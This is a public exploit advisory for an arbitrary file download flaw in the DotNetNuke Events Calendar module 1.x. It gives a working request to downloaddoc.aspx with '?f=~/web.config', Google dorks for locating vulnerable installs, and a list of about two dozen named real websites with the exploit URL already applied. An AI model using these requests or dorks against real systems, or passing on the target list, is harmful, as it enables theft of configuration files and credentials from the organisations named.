DotNetNuke Events Calendar module version 1.x suffers from a file download vulnerability.
d1f15fdff9c3ce905cddafdc3c7a9f8010b8c470014491176215fee55f096cd8
####################################################################
# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File
Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link :
store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and
Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16 [ Configuration ]
####################################################################
# Description :
*************
* Events Calendar is a calendar to add and display events with time and
description in rich text editor.
* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
is prone to a vulnerability that lets attackers download arbitrary files
because
the application fails to sufficiently verify user-supplied input.
* This may allow an attacker to gain access to sensitive information, which
may aid in launching further attacks.
* The attacker can download and read all and any files known by the name
via '?f=' parameter.
# Arbitrary File Download Exploit :
*******************************
/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
####################################################################
# Example Vulnerable Sites :
*************************
Note : (38.95.37.77) => There are 73 domains hosted on this server.
[+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+]
abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################